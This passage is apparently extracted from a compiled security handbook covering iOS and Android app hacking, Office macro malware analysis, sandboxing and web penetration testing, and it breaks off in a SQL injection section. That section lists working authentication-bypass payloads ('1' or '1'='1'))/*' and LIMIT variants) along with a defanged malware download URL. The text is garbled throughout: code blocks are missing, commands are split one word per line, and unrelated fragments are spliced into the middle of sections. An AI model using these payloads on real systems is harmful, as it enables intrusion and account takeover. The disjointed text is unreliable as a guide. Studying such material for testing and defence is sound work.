to var/mobile/Containers/Bundle/Applications/Containers/Bundle/LOGINVIEW/LOGINV
your mac and upload the new Binary. Copy the file path of LOGINVIEW for
pasting it in NewTerm on your iDevice (in may case it was:
/var/mobile/Containers/Bundle/Application/2974EF19-3D00-4B19-B74B-
D7819BD7BD20/LOGINVIEW.app)
Now run "LOGINVIEW". If you follow the instructions you now have a
successful hacked it! Screen message. Open the Log-in App and press the
"OK" button, without entering anything as a username or a password.
Summary
A lot of the new data sources that have shown up are the ability to dump the
users photo album, copy their MMS or SMS databases, your notes, your
address book, screenshots of your activity, your keyboard typing cache which
comes from autocorrect, a number of other personal artifacts of data. They
should never come off the phone except for backup. The problem is, these
mechanisms now is that theyve grown so large, theyre dumping a lot of data
and they bypass backup encryption.
When the user has their phone connected to their desktop, they can turn on
backup encryption and enter a password. It tells the phone, if anything comes
off of the phone, they can make a backup. If I turn encryption back on my
personal device, and then run a backup on iTunes, that backup is completely
encrypted and protected. However, when you use these interfaces that Ive
been discussing, that backup encryption is bypassed.
It may be due to sloppy engineering, or some other decision Apple made, I
cant speculate as to why. All I can really say is because of that mechanism,
because of that one reality, it can be very dangerous. You can use this
mechanism to not only pull personal data off, you can also (bypass the
encryption) wirelessly, in a number of cases. It really opens up various
security concerns, for a specific set of threat models.
Reverse Engineering Android
Applications
Reverse engineering Android applications can be really fun and give you a
decent knowledge for the inner workings of the Dalvik Virtual Machine. This
post will be an all-out, start-to-finish, beginners* tutorial on the tools and
practices of reverse engineering Android through the disassembly and code
injection of the Android Hello World application.
*Beginner means that you know a bit about Android and Java in general, if
not, learn a bit first and come back. Experience in the terminal environment on
your machine is also probably necessary.
THE APK
In order to start reverse engineering, you must first understand what youre
working with. So what exactly is an apk? (hint: not American Parkour.) An
Android package, or apk, is the container for an Android apps resources and
executables. Its a zipped file that contains simply:
classes.dex
res/
lib/ (sometimes)
META-INF/
The meat of the application is the classes.dex file, or the Dalvik executable
(get it, dex) that runs on the device. The applications resources (i.e. images,
sound files) reside in the res directory, and the AndroidManifest.xml is more
or less the link between the two, providing some additional information about
the application to the OS. The lib directory contains native libraries that the
application may use via NDK, and the META-INF directory contains
information regarding the applications signature.
You can grab the HelloWorld apk we will be hacking here. The source to this
apk is available from the developer docs tutorial.
THE TOOLS
In order to complete this tutorial, youll need to download and install the
following tools:
apktool
jarsigner
keytool
$ cd ~/Desktop/HelloWorld
Execution of the apktool binary without arguments will give you its usage, but
we will only use the d (dump) and b (build) commandline options for this
tutorial. Dump the apk using the apktool d option:
$ apktool d HelloWorld.apk
This will tell the tool to decode the assets and disassemble the .dex file in the
apk. When finished, you will see the ./HelloWorld directory, containing:
res/ (decoded)
smali/
apktool.yml
$ ls HelloWorld/smali/com/test/helloworld/ HelloWorldActivity.smali
R$attr.smali R$drawable.smali R$layout.smali R$string.smali R.smali
HelloWorldActivity.java
R.java
Where R.java contains inner classes attr, string, and so on. Its evident that
HelloWorldActivity is the activity thats displayed when the app launches, so
what exactly is R?
Lets break down whats going on here in java first. In line 07, we define our
HelloWorldActivity class that extends android.app.Activity, and within that
class, override the onCreate() method. Inside the method, we create an
instance of the TextView class and call the TextView.setText() method with our
message. Finally, in line 15 we set the view by calling setContentView(),
passing in the TextView instance.
In smali, we can see that we have a bit more going on. Lets break it up into
sections, we have:
The constructor has seemingly appeared out of no where, but really was
inserted by the compiler because we extended another class. You can see that
in line 12 the virtual machine is to make a direct invokation of the super
classes constructor this follows the nature of subclasses, they must call their
superclasses constructor.
Data Types
In the onCreate() method beginning on line 19, we can see that the smali
method definition isnt that far off from its java counterpart. The methods
parameter types are defined within the parenthesis (semicolon separated) with
the return type discreetly placed on the end of the .method line. Object return
types are easy to recognize, given they begin with an L and are in full
namespace. Java primitives, however, are represented as capital chars and
follow the format:
So for our onCreate() definition in smali, we can expect a void return value.
Registers
Moving one line down, on line 20 we see the .locals directive. This
determines how many registers the Dalvik vm will use for this
method_without_ including registers allocated to the parameters of the
method. Additionally, the number of parameters for any virtual method will
always be the number of input parameters + 1. This is due to an implicit
reference to the current object that resides in parameter register 0 or p0 (in
java this is called the this reference). The registers are essentially
references, and can point to both primitive data types and java objects. Given
2 local registers, 1 parameter register, and 1 this reference, the onCreate()
method uses an effective 4 registers.
For convenience, smali uses a v and p naming convention for local vs.
parameter registers. Essentially, parameter (p) registers can be represented by
local (v) registers and will always reside in the highest available registers.
For this example, onCreate() has 2 local registers and 2 parameter registers, so
the naming scheme will look something like this:
Opcodes
Dalvik opcodes are relatively straightforward, but there are a lot of them. For
the sake of this posts length, well only go over the basic (yet important)
opcodes found in our example HelloWorldActivity.smali. In the onCreate
method in HelloWorldActivity the following opcodes are used:
Toast.makeText(getApplicationContext(), "Hacked!",
Toast.LENGTH_SHORT).show();
How do we do this in smali? Easy, lets just compile this into another
application and disassemble. The end result is something like this:
Now, lets ensure we have the right amount of registers in our original
onCreate() to support these method calls. We can see that the highest register in
the code we want to patch is v3, which we have but will require us to
overwrite both of our parameter registers. Given we wont be using either of
those registers after setContentView(), this number is appropriate. Our final
patched HelloWorldActivity.smali should look like:
$ apktool b ./HelloWorld
This will instruct apktool to rebuild the app, however, this rebuilt app will not
be signed. We will need to sign the app before it can be successfully installed
on any device or emulator.
Then youre done! Install the app onto your device or emulator.
Malware Analysis
Once you have understood the basics of reverse engineering you can move on
to malware analysis.
The most important thing is to prevent your infection of your hardware and
software, while analyzing malware. The samples we use are real and improper
handling may result in pretty nasty infections.
You need:
knowledge in programming.
an OS different from Windows for your main system. I recommend
Linux. The malware samples we use targeted at Windows systems.
So using another system is the safest choice for you.
for the future, but not for this tutorial: a virtual machine, e.g., use
VMWare or VirtualBox. Create a VM with any Windows OS on it,
so you can test samples.
If it is for any reason impossible for you to use a Linux system, you must take
other precautions. Accidentally running the sample by command line or
clicking can happen very easily. So:
Never use an executable file extention for a sample, e.g., instead of
.exe use .ex1.
Save the sample in a folder with permissions that disallow running
the file.
First Observations:
Now you have a file, but you don't know what kind of file it is. The file type is
the most important thing to start with. I usually open a file in a hex editor to
take a look at it.
Another part of research, which I often use: Check if the file is listed on
Virustotal. Use the command sha256sum on Linux to get the hash value and
search by hash.
Virustotal does not only list detections, it also shows lots of additional
information about the file, depending on the filetype.
You can of course also upload the file, but sometimes there are reasons not to
do so. E.g. the file might contain private information that shouldn't be available
on the web.
Now let's use a hex editor. It can be any of your choice. For Linux I use Bless.
Scroll a bit through the file and see if you recognize any strings.
At some point you might see this:
The Code
Luckily there are some tools out there who help to reverse engineer these
documents.
Download the most recent zip of oletools from
here: https://bitbucket.org/decalage/oletools/downloads
These are python tools, which you use from command line. Their purpose can
be found here:http://www.decalage.info/en/book/export/html/79
Use olevba to extract any macro code from the word document:
This will save the result in vba_extracted. Open vba_extracted in a text editor.
You will see a lot of code that does not look much useful. The code has in fact
a slight obfuscation. Most commands are clutter.
Have a look at the very end of the text file. You will find a table with a
summary, which was done by olevba. This is a very useful summary as it
points you to important parts of the code. Now search for the string "Environ"
in the file.
There you can see some interesting hex strings. To get the meaning of these hex
strings open a terminal and the python interpreter.
"568756E2E69626F237A6F2D6F636E24756E6F686361666F2F2A307474786"
We save one of the strings in a variable.
The VBA macro reverses the string, so we do the same:
The last step is to transform this hex representation into a readable string.
The result will show you a download path for an executable. Warning: Even if
it is tempting, you must not visit a website found in malicious files! But you
may do some additional research with whois.
"05D45445"[::-1].decode("hex")
You will get the following strings
hxxp://fachonet.com/js/bin.exe
\\YEWZMJFAHIB.exe
TEMP
Obviously this document is a downloader, which saves the downloaded file as
YEWZMJFAHIB.exe in the TEMP directory.
Search for some of the other keywords shown in the table at the bottom and
explore the code. You will find the code that writes the file to disk and the part
that runs it.
That was the first malware analysis tutorial. Macro malware seemed dead for
while, but a new wave of it popped up again. Office documents are usually
droppers or downloaders, which means they are the initial carriers for
infection with malware.
Reverse Engineering Linux
Malware
REMnux is a free,lightweight Linux (Ubuntu distribution) toolkit for reverse-
engineering malicious software.
REMnux provides the collection of some of the most common and effective
tools used for reverse engineering malwares in categories like:
Each automated malware analysis tool uses different backend systems to run
the malware in a controlled environment. Malware can be run in physical
machines or virtual machines. Note that old unused physical machines lying
around at home would be a perfect candidate for setting up a malware analysis
lab, which would make it considerably more difficult for malware binaries to
determine whether they are being executed in a controlled environment. When
building our own malware analysis lab, we have to connect multiple machines
together to form a network, which can be done simply by virtual or physical
switch, depending on the type of machines used.
Each cloud automated malware analysis services uses some kind of
virtualization environment to run their malware samples, like Qemu/KVM,
VirtualBox, VMWare, etc. According to the virtualization technology being
used, a malware sample can use different techniques to detect that its being
analyzed and terminate immediately. Thus the malware sample will not be
flagged as malicious, since it terminated preemptively without execution the
malicious code.
In this section weve seen that different cloud malware analysis services use
different virtualization technologies to run submitted malware samples. As far
as I know, only Joe Sandbox has an option of running malware samples on
actual physical machines, which prevents certain techniques from being used in
malware samples to detect if they are being run in an automated malware
analysis environment. Still, there are many other techniques a malware can use
to detect if its being analyzed.
This is a cat and mouse game, where new detection techniques are invented
and used by malware samples on a daily basis. On the other hand, there are
numerous anti-detection techniques used to prevent the malware from
determining its being executed in an automated malware analysis environment.
When a new detection technique appears, usually a new anti-detection
technique is put together to render the detection technique useless.
Each service supports only a fraction of all file formats and document types in
which malicious code can be injected. Therefore, depending on the file we
have to analyze, we can use the services that support its corresponding file
format or document type.
In order to analyze a document, we have to choose the appropriate service in
order to do so. Since there are many techniques an attacker can use to
determine whether the malicious payload is being executed in an automated
malware analysis environment, some malicious samples wont be analyzed
correctly, resulting in false positives. Therefore, such services should only be
used together with a reverse engineer or malware analyst in order to manually
determine whether the file is malicious or not. Since there are many malicious
samples distributed around the Internet on a daily basis, every sample cannot
be manually inspected, which is why cloud automated malware analysis
services are a great way to speed up the analysis.
The Future
Weaponized documents (I really hate this name!) are just another method used
by bad guys to deliver malicious payload. Recently this technique was used by
criminal groups delivering banking trojans (e.g. Dridex), but as you might
expect it was also used by APT actors (e.g. Rocket Kitten in Operation Woolen
Goldfish). Regardless of the threat type (APT, commodity, etc.) analysis of the
malicious documents should be an essential skill of every analyst.
Another objects that you might encounter in the OLE files are macros. Macros
allow to automate tasks and add functionality to your documents like reports,
forms, etc. Macros can use Visual Basic (VBA) which is where bad guys will
often try to hide their malicious code. This is what we are after in this
handbook - finding and extracting malicious code from OLE files!
Code deobfuscation
There is never a one fits all solution to deobfuscate code. Good thing to start
with is to clean up the code from randomly generated variable names. For this
just open the code in any text editor and use find and replace feature to
replace randomly named variables into something more readable.
I like to rename variables so they start with capital letter informing me about
the variable type.
Its never a good option to rely on only one tool. Analyzing malicious
documents is all about finding, extracting and analyzing malicious code. What
would happen if bad guys used different obfuscation methods, document types
or came up with new unknown technique? Would you be prepared with your
current toolset? Having backup plan and additional tools in your toolset makes
you ready for such scenario. In our short analysis OfficeMalScanner was not
able to extract both streams correctly. What if this was your go to tool? Would
you be able to perform analysis? I am not saying that any tool described in this
post is better or worse than the other, all of them are great tools and allow you
to do things differently it all really depends on your requirements.
For instance officeparser.py and oledump.py allow you to interact with the file
internals, however this might not be the most efficient approach if you have to
analyze few documents where writing a while loop and dumping the malicious
code will do the trick for you.
The shellcode may be designed to search for a second stage payload or other
embedded artifacts elsewhere in the originating file. This may be the case if
the buffer being exploited was limited in size, the malware author may have
placed the secondary stage shellcode, or perhaps even an embedded
obfuscated executable, elsewhere in the document within a buffer that has
significantly greater capacity.
In order to locate the specific offset within the document that the secondary
stage code resides, the shellcode may try to locate itself either in memory or on
the hard drive and then use the known offset to the next piece of code to make
reference to, extract and execute it. One way this can be achieved (that I've
recently seen) is by identifying and making use of the handle which refers to
the document from which the shellcode originated, which would typically have
been created by the program which loaded the file. A popular way to find the
handle is to iterate through all possible handle values and making use of the
Microsoft Windows GetFileSize API call which is designed to return the file
size related to the specified handle. As the author knows the expected size of
their malicious document, they are able to hard code this in, enabling this
process to take place. Therefore, it doesn't matter where on the hard drive or in
memory the malicious document resides.
Ethical Reverse Engineering
There are two basic legalities associated with reverse engineering:
Claim that the idea is not novel and is an obvious step for anyone
experienced in the particular field.
Make a subtle change and claim that the changed product is not
protected by patent.
3. second party then builds product from the given description. This
product might achieve the same end effect but will probably have a
different solution approach.
At this point, you would encounter issues if the shellcode was being run from
from a new file. In the case of a malicious RTF, this could be an OLE object
extracted using RTFscan rather than the original file, which would inevitably
have a different size to the original document. Therefore the handle to the
original document would not be found in the context of the process, the
referencing of embedded artifacts would fail, and this would hinder our
analysis.
A potential solution would be to create a handle to the original file within the
newly formed process, as this would allow the shellcode to make reference to
the original document and extract the data it requires. Without the source code
to MalHost-Setup, this is slightly more difficult, but we can achieve this using
a capability built into Windows which allows handles from a parent process to
be inherited to any child processes launched, the steps to achieve this are
listed below.
1. Create a handle to a file using the 'CreateFile' API call
2. Launch a new process using the 'CreateProcess' API call,
specifying the security parameters to enable the child to inherit the
parent's handles.
We have created our own malware lab with some basic tools. Now were
going to use someone elses sandbox. The automated analysis provided by
Malwr.com has been tremendously useful in the short time that I have been
using it. Its a great tool for getting things done quickly. Keep in mind that even
though a lot of the essentials are automated here, well stick to a more manual
approach in future posts.
Word Doc Sandbox
The first stage of the malware is the malicious resume that we received. Now,
many sandboxes are built specifically for executables, but there are
exceptions. One such exception is Xec-Scan which handles Word documents.
Submitting our sample to Xec-Scan gives us something we had already
discovered: the domain to which the malware calls.
Using these results, its easier to narrow down what happens when and focus
on points of interest. For example, maybe we are worried about a keylogger.
The hooking part of the timeline could give us an idea of when or if the
malware is hooking our keyboard to gather keystrokes. Registry persistence is
another worry. Just take a look at the registry calls to see if there is anything
that we might be interested in.
The last thing I found interesting was the dropped files tab. We can see our
lamprey dll there, as well as a tmp file. What do these do, how are they used?
Our Own Automated Sandbox
Sometimes for whatever reason, we may not want to share these files with
others. This could be proprietary research, it could be that you have created
your own malware, or perhaps you have something that you dont want to be
out in the public. Luckily, there are tools available to build your own. If you
liked Malwr.com, Cuckoo Sandbox is probably the tool for you. Malwr.com is
built on top of Cuckoo. You could also take the environment from the original
post and expand that to fit your needs.
Where Do We Fit It In?
With all this information that we gained from this automated tool, whats the
point in learning about malware analysis? One thing malware can do is detect
and avoid analysis, so for all we know it was designed to do nothing in this
kind of environment. So maybe we arent getting the full picture from these
tools. We also know it didnt call out when this was run, so what did it do?
There are a lot of questions that I got from looking at the results, so taking a
deeper look could prove useful. I also have found a lot of value in learning
some of these tools as there is definite carry-over knowledge in other Infosec
areas. Being able to use IDA proficiently will hopefully help me
in vulnerability research. Setting up this environment has made me more
cautious about handling malware. I am learning about Windows internals,
which has been useful in some tool writing I have done. Even if the automated
tools are all you need, I hope that you can find some value in learning to
reverse engineer malware. I know I have.
The Penetration Testing Of Web
Applications
A penetration test is a method of evaluating the security of a computer system
or network by simulating an attack. A Web Application Penetration Test
focuses only on evaluating the security of a web application.
The process involves an active analysis of the application for any weaknesses,
technical flaws, or vulnerabilities. Any security issues that are found will be
presented to the system owner together with an assessment of their impact and
often with a proposal for mitigation or a technical solution.
Vulnerabilities
Enumerating the application and its attack surface is a key precursor before
any attack should commence. This section will help you identify and map out
every area within the application that should be investigated once your
enumeration and mapping phase has been completed.
Application Discovery
User-agent: *
Allow:
/searchhistory/
Disallow:
/news?
output=xhtml&
Allow:
/news?
output=xhtml
Disallow:
/search
Disallow:
/groups
Disallow:
/images
...
User-agent: *
...
Disallow: /search
Disallow: /groups
Disallow: /images
...
The robots.txt file is retrieved from the web root directory of the web
server. For example, to retrieve the robots.txt from www.google.com using
wget:
$
wget
http://www.google.com/robots.txt
-
-23:59:24-
-
http://www.google.com/robots.txt
=> 'robots.txt'
2. On the Dashboard, click the URL for the site you want.
Once the GoogleBot has completed crawling, it commences indexing the web
page based on tags and associated attributes, such as <TITLE>, in order to
return the relevant search results. [1]
If the robots.txt file is not updated during the lifetime of the web site, then it is
possible for web content not intended to be included in Google's Search
Results to be returned.
Google provides the Advanced "cache:" search operator, but this is the
equivalent to clicking the "Cached" next to each Google Search Result.
Hence, the use of the Advanced "site:" Search Operator and then clicking
"Cached" is preferred.
The Google SOAP Search API supports the doGetCachedPage and the
associated doGetCachedPageResponse SOAP Messages to assist with
retrieving cached pages.
Entry Points
Enumerating the application and its attack surface is a key precursor before
any thorough testing can be undertaken, as it allows the tester to identify
likely areas of weakness. This section aims to help identify and map out
areas within the application that should be investigated once enumeration
and mapping has been completed.
Before any testing begins, always get a good understanding of the application
and how the user/browser communicates with it. As you walk through the
application, pay special attention to all HTTP requests (GET and POST
Methods, also known as Verbs), as well as every parameter and form field
that are passed to the application. In addition, pay attention to when GET
requests are used and when POST requests are used to pass parameters to the
application. It is very common that GET requests are used, but when sensitive
information is passed, it is often done within the body of a POST request.
Note that to see the parameters sent in a POST request, you will need to use a
tool such as an intercepting proxy (for example, OWASP's WebScarab) or a
browser plug-in. Within the POST request, also make special note of any
hidden form fields that are being passed to the application, as these usually
contain sensitive information, such as state information, quantity of items, the
price of items, that the developer never intended for you to see or change.
The proxy will keep track of every request and response between you and the
application as you walk through it. Additionally, at this point, testers usually
trap every request and response so that they can see exactly every header,
parameter, etc. that is being passed to the application and what is being
returned. This can be quite tedious at times, especially on large interactive
sites (think of a banking application). However, experience will teach you
what to look for, and, therefore, this phase can be significantly reduced. As
you walk through the application, take note of any interesting parameters in the
URL, custom headers, or body of the requests/responses, and save them in
your spreadsheet. The spreadsheet should include the page you requested (it
might be good to also add the request number from the proxy, for future
reference), the interesting parameters, the type of request (POST/GET), if
access is authenticated/unauthenticated, if SSL is used, if it's part of a multi-
step process, and any other relevant notes. Once you have every area of the
application mapped out, then you can go through the application and test each
of the areas that you have identified and make notes for what worked and what
didn't work.
Requests:
Identify where GETs are used and where POSTs are used.
Responses:
The following are 2 examples on how to check for application entry points.
EXAMPLE 1:
This example shows a GET request that would purchase an item from an online
shopping application.
GET https://x.x.x.x/shoppingApp/buyme.asp?
CUSTOMERID=100&ITEM=z101a&PRICE=62.50&IP=x.x.x.x
Host: x.x.x.x
Cookie:
SESSIONID=Z29vZCBqb2IgcGFkYXdhIG15IHVzZXJuYW1lIGlzIGZvbyBhbm
Result Expected:
Here you would note all the parameters of the request such as CUSTOMERID,
ITEM, PRICE, IP, and the Cookie (which could just be encoded parameters or
used for session state).
EXAMPLE 2:
This example shows a POST request that would log you into an application.
Host: x.x.x.x
Cookie:
SESSIONID=dGhpcyBpcyBhIGJhZCBhcHAgdGhhdCBzZXRzIHByZWRpY3Rh
MTIzNA==
CustomCookie=00my00trusted00ip00is00x.x.x.x00
user=admin&pass=pass123&debug=true&fromtrustIP=true
Result Expected:
In this example you would note all the parameters as you have before but
notice that the parameters are passed in the body of the message and not
in the URL. Additionally note that there is a custom cookie that is being
used.
Web Server Finger Printing
Web server fingerprinting is a critical task for the Penetration tester.
Knowing the version and type of a running web server allows testers to
determine known vulnerabilities and the appropriate exploits to use during
testing.
There are several different vendors and versions of web servers on the
market today. Knowing the type of web server that you are testing
significantly helps in the testing process, and will also change the course of
the test. This information can be derived by sending the web server specific
commands and analyzing the output, as each version of web server software
may respond differently to these commands. By knowing how each type of
web server responds to specific commands and keeping this information in a
web server fingerprint database, a penetration tester can send these
commands to the web server, analyze the response, and compare it to the
database of known signatures. Please note that it usually takes several
different commands to accurately identify the web server, as different
versions may react similarly to the same command. Rarely, however, different
versions react the same to all HTTP commands. So, by sending several
different commands, you increase the accuracy of your guess.
The simplest and most basic form of identifying a Web server is to look at the
Server field in the HTTP response header. For our experiments we use netcat.
Consider the following HTTP Request-Response:
$
nc
202.41.76.251
80
HEAD
/
HTTP/1.0
HTTP/1.1 200 OK
ETag: "1813-49b-361b4df6"
Accept-Ranges: bytes
Content-Length: 1179
Connection: close
Content-Type: text/html
From the Server field, we understand that the server is likely Apache, version
1.3.3, running on Linux operating system.
HTTP/1.1 200 OK
Server: Apache/1.3.23
ETag: 32417-c4-3e5d8a83
Accept-Ranges: bytes
Content-Length: 196
Connection: close
Content-Type: text/HTML
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Content-Type: text/HTML
Accept-Ranges: bytes
Content-Length: 7369
HTTP/1.1 200 OK
Server: Netscape-Enterprise/4.1
Content-type: text/HTML
Accept-ranges: bytes
Connection: close
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-length: 1186
Content-type: text/html
Accept-Ranges: bytes
Connection: close
Date:
Mon,
16
Jun
2003
02:41:
27
GMT
Server:
Unknown-
Webserver/1.0
Connection:
close
In this case, the server field of that response is obfuscated: we cannot know
what type of web server is running.
Protocol behavior
The first method consists of observing the ordering of the several headers
in the response. Every web server has an inner ordering of the header. We
consider the following answers as an example:
$
nc
apache.example.com
80
HEAD
/
HTTP/1.0
HTTP/1.1 200 OK
Server: Apache/1.3.23
Accept-Ranges: bytes
Content-Length: 196
Connection: close
Content-Type: text/HTML
$
nc
iis.example.com
80
HEAD
/
HTTP/1.0
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Content-Location: http://iis.example.com/Default.htm
Accept-Ranges: bytes
Content-Length: 133
Response
from
Netscape
Enterprise
4.1
$
nc
netscape.example.com
80
HEAD
/
HTTP/1.0
HTTP/1.1 200 OK
Server: Netscape-Enterprise/4.1
Content-type: text/HTML
Content-length: 57
Accept-ranges: bytes
Connection: close
$
nc
sunone.example.com
80
HEAD
/
HTTP/1.0
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-length: 0
Content-type: text/html
Connection: close
We can notice that the ordering of the Date field and the Server field differs
between Apache, Netscape Enterprise, and IIS.
$
nc
apache.example.com
80
GET
/
HTTP/3.0
Server: Apache/1.3.23
Connection: close
Transfer: chunked
$
nc
iis.example.com
80
GET
/
HTTP/3.0
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Content-Location: http://iis.example.com/Default.htm
Content-Type: text/HTML
Accept-Ranges: bytes
Content-Length: 133
Response
from
Netscape
Enterprise
4.1
$
nc
netscape.example.com
80
GET
/
HTTP/3.0
Server: Netscape-Enterprise/4.1
Content-length: 140
Content-type: text/HTML
Connection: close
$
nc
sunone.example.com
80
GET
/
HTTP/3.0
Server: Sun-ONE-Web-Server/6.1
Connection: close
$
nc
apache.example.com
80
GET
/
JUNK/1.0
HTTP/1.1 200 OK
Server: Apache/1.3.23
ETag: 32417-c4-3e5d8a83
Accept-Ranges: bytes
Content-Length: 196
Connection: close
Content-Type: text/HTML
$
nc
iis.example.com
80
GET
/
JUNK/1.0
Server: Microsoft-IIS/5.0
Content-Type: text/HTML
Content-Length: 87
Response
from
Netscape
Enterprise
4.1
$
nc
netscape.example.com
80
GET
/
JUNK/1.0
<HTML>
<HEAD>
<TITLE>Bad
request</TITLE>
</HEAD>
<BODY>
<H1>Bad
request</H1>
$
nc
sunone.example.com
80
GET
/
JUNK/1.0
<HTML>
<HEAD>
<TITLE>Bad
request</TITLE>
</HEAD>
<BODY>
<H1>Bad
request</H1>
Automated Testing
The tests to carry out in order to accurately fingerprint a web server can be
many. Luckily, there are tools that automate these tests. "httprint" is one of
such tools. httprint has a signature dictionary that allows one to recognize the
type and the version of the web server in use.
Application Discovery
Other issues affecting the scope of the assessment are represented by web
applications published at non-obvious URLs (e.g.,
http://www.example.com/some-strange-URL), which are not referenced
elsewhere. This may happen either by error (due to misconfiguration), or
intentionally (for example, unadvertised administrative interfaces).
There are three factors influencing how many applications are related to a
given DNS name (or an IP address):
2. Non-standard ports
While web applications usually live on port 80 (http) and 443 (https), there is
nothing magic about these port numbers. In fact, web applications may be
associated with arbitrary TCP ports, and can be referenced by specifying the
port number as follows: http[s]://www.example.com:port/. For example,
http://www.example.com:20000/.
3. Virtual hosts
It is sufficient to examine the output and look for http or the indication of
SSL-wrapped services (which should be probed to confirm that they are
https). For example, the output of the previous command could look like:
(The 65527 ports scanned but not shown below are in state: closed)
$
telnet
192.168.10.100
8000
Trying
192.168.1.100...
Connected
to
192.168.1.100.
Escape
character
is
'^]'.
GET
/
HTTP/1.0
HTTP/1.0
200
OK
pragma:
no-
cache
Content-
Type:
text/html
Server:
MX4J-
HTTPD/1.0
expires:
now
Cache-
Control:
no-
cache
<html>
...
The same task may be performed by vulnerability scanners but first check
that your scanner of choice is able to identify http[s] services running on non-
standard ports. For example, Nessus [3] is capable of identifying them on
arbitrary ports (provided you instruct it to scan all the ports), and will provide
with respect to nmap a number of tests on known web server
vulnerabilities, as well as on the SSL configuration of https services. As
hinted before, Nessus is also able to spot popular applications / web
interfaces which could otherwise go unnoticed (for example, a Tomcat
administrative interface).
There are a number of techniques which may be used to identify DNS names
associated to a given IP address x.y.z.t.
www.owasp.org
is
an
alias
for
owasp.org.
owasp.org
name
server
ns1.secure.net.
owasp.org
name
server
ns2.secure.net.
A zone transfer may now be requested to the name servers for domain
example.com. If you are lucky, you will get back a list of the DNS entries for
this domain. This will include the obvious www.example.com and the not-so-
obvious helpdesk.example.com and webmail.example.com (and possibly
others). Check all names returned by the zone transfer and consider all of
those which are related to the target being evaluated.
Trying to request a zone transfer for owasp.org from one of its name servers:
$
host
-
l
www.owasp.org
ns1.secure.net
Using
domain
server:
Name:
ns1.secure.net
Address:
192.220.124.10#53
Aliases:
Host
www.owasp.org
not
found:
5(REFUSED)
;
Transfer
failed.
This process is similar to the previous one, but relies on inverse (PTR) DNS
records. Rather than requesting a zone transfer, try setting the record type to
PTR and issue a query on the given IP address. If you are lucky, you may get
back a DNS name entry. This technique relies on the existence of IP-to-
symbolic name maps, which is not guaranteed.
This kind of search is akin to DNS zone transfer, but relies on web-based
services that enable name-based searches on DNS. One such service is the
Netcraft Search DNS service, available at http://searchdns.netcraft.com/?
host. You may query for a list of names belonging to your domain of choice,
such as example.com. Then you will check whether the names you obtained
are pertinent to the target you are examining.
Reverse-IP services
Reverse-IP services are similar to DNS inverse queries, with the difference
that you query a web-based application instead of a name server. There is a
number of such services available. Since they tend to return partial (and often
different) results, it is better to use multiple services to obtain a more
comprehensive analysis.
A common error that we can see during our search is the HTTP 404 Not
Found. Often this error code provides useful details about the underlying web
server and associated components. For example:
Not Found
Web server errors aren't the only useful output returned requiring
security analysis. Consider the next example error message:
In this example, the 80004005 is a generic IIS error code which indicates
that it could not establish a connection to its associated database. In many
cases, the error message will detail the type of the database. This will often
indicate the underlying operating system by association. With this
information, the penetration tester can plan an appropriate strategy for the
security test.
By manipulating the variables that are passed to the database connect string,
we can invoke more detailed errors.
Microsoft
OLE DB
Provider for
ODBC
Drivers
(0x80004005)
[MySQL]
[ODBC 3.51
Driver]Unknown
MySQL
server host
If we see in the HTML code of the logon page the presence of a hidden
field with a database IP, we can try to change this value in the URL with
the address of database server under the penetration tester's control in an
attempt to fool the application into thinking that the logon was successful.
There are various ways by which errors can be handled in dot net framework.
Errors are handled at three places in ASP .net:
<customErrors
defaultRedirect="myerrorpagedefault.aspx"
mode="On|Off|RemoteOnly"> <error
statusCode="404"
redirect="myerrorpagefor404.aspx"/>
<error
statusCode="500"
redirect="myerrorpagefor500.aspx"/>
</customErrors>
End Sub
End Sub
http:\\www.mywebserver.com\anyrandomname.asp
it means that IIS custom errors are not configured. Please note the .asp
extension.
Also test for .net custom errors. Type a random page name with aspx extension
in your browser:
http:\\www.mywebserver.com\anyrandomname.aspx
--------------------------------------------------------------------------------
Description: HTTP 404. The resource you are looking for (or one of its
dependencies) could have been removed, had its name changed, or is
temporarily unavailable. Please review the following URL and make
sure that it is spelled correctly. Custom errors for .net are not
configured.
This moves us into the realms of reverse engineering network software and
databases.
Database Testing
SQL Injection
SQL Injection attacks can be divided into the following three classes:
Independent of the attack class, a successful SQL Injection attack requires the
attacker to craft a syntactically correct SQL Query. If the application returns an
error message generated by an incorrect query, then it is easy to reconstruct the
logic of the original query and, therefore, understand how to perform the
injection correctly. However, if the application hides the error details, then the
tester must be able to reverse engineer the logic of the original query. The
latter case is known as "Blind SQL Injection".
The tester has to make a list of all input fields whose values could be used in
crafting a SQL query, including the hidden fields of POST requests and then
test them separately, trying to interfere with the query and to generate an error.
The very first test usually consists of adding a single quote (') or a semicolon
(;) to the field under test. The first is used in SQL as a string terminator and, if
not filtered by the application, would lead to an incorrect query. The second
is used to end a SQL statement and, if it is not filtered, it is also likely to
generate an error. The output of a vulnerable field might resemble the
following (on a Microsoft SQL Server, in this case):
Also comments (--) and other SQL keywords like 'AND' and 'OR' can be
used to try to modify the query. A very simple but sometimes still effective
technique is simply to insert a string where a number is expected, as an
error like the following might be generated:
$username
=
1'
or
'1'
=
'1
$password
=
1'
or
'1'
=
'1
If we suppose that the values of the parameters are sent to the server
through the GET method, and if the domain of the vulnerable web site is
www.example.com, the request that we'll carry out will be:
http://www.example.com/index.php?
username=1'%20or%20'1'%20=%20'1&password=1'%20or%20'1'%20=%2
0'1
After a short analysis we notice that the query returns a value (or a set of
values) because the condition is always true (OR 1=1). In this way the
system has authenticated the user without knowing the username and
password.
In some systems the first row of a user table would be an administrator user.
This may be the profile returned in some cases.
In this case, there are two problems, one due to the use of the parentheses and
one due to the use of MD5 hash function. First of all, we resolve the problem
of the parentheses. That simply consists of adding a number of closing
parentheses until we obtain a corrected query. To resolve the second problem,
we try to invalidate the second condition. We add to our query a final symbol
that means that a comment is beginning. In this way, everything that follows
such symbol is considered a comment. Every DBMS has its own symbols of
comment, however, a common symbol to the greater part of the database is /*.
In Oracle the symbol is "--". This said, the values that we'll use as Username
and Password are:
$username
=
1'
or
'1'
=
'1'))/*
$password
=
foo
http://www.example.com/index.php?
username=1'%20or%20'1'%20=%20'1'))/*&password=foo
$username
=
1'
or
'1'
=
'1'))
LIMIT
1/*
$password
=
foo
http://www.example.com/index.php?
username=1'%20or%20'1'%20=%20'1'))%20LIMIT%201/*&password=fo o
Another test involves the use of the UNION operator. This operator is used in
SQL injections to join a query, purposely forged by the tester, to the original
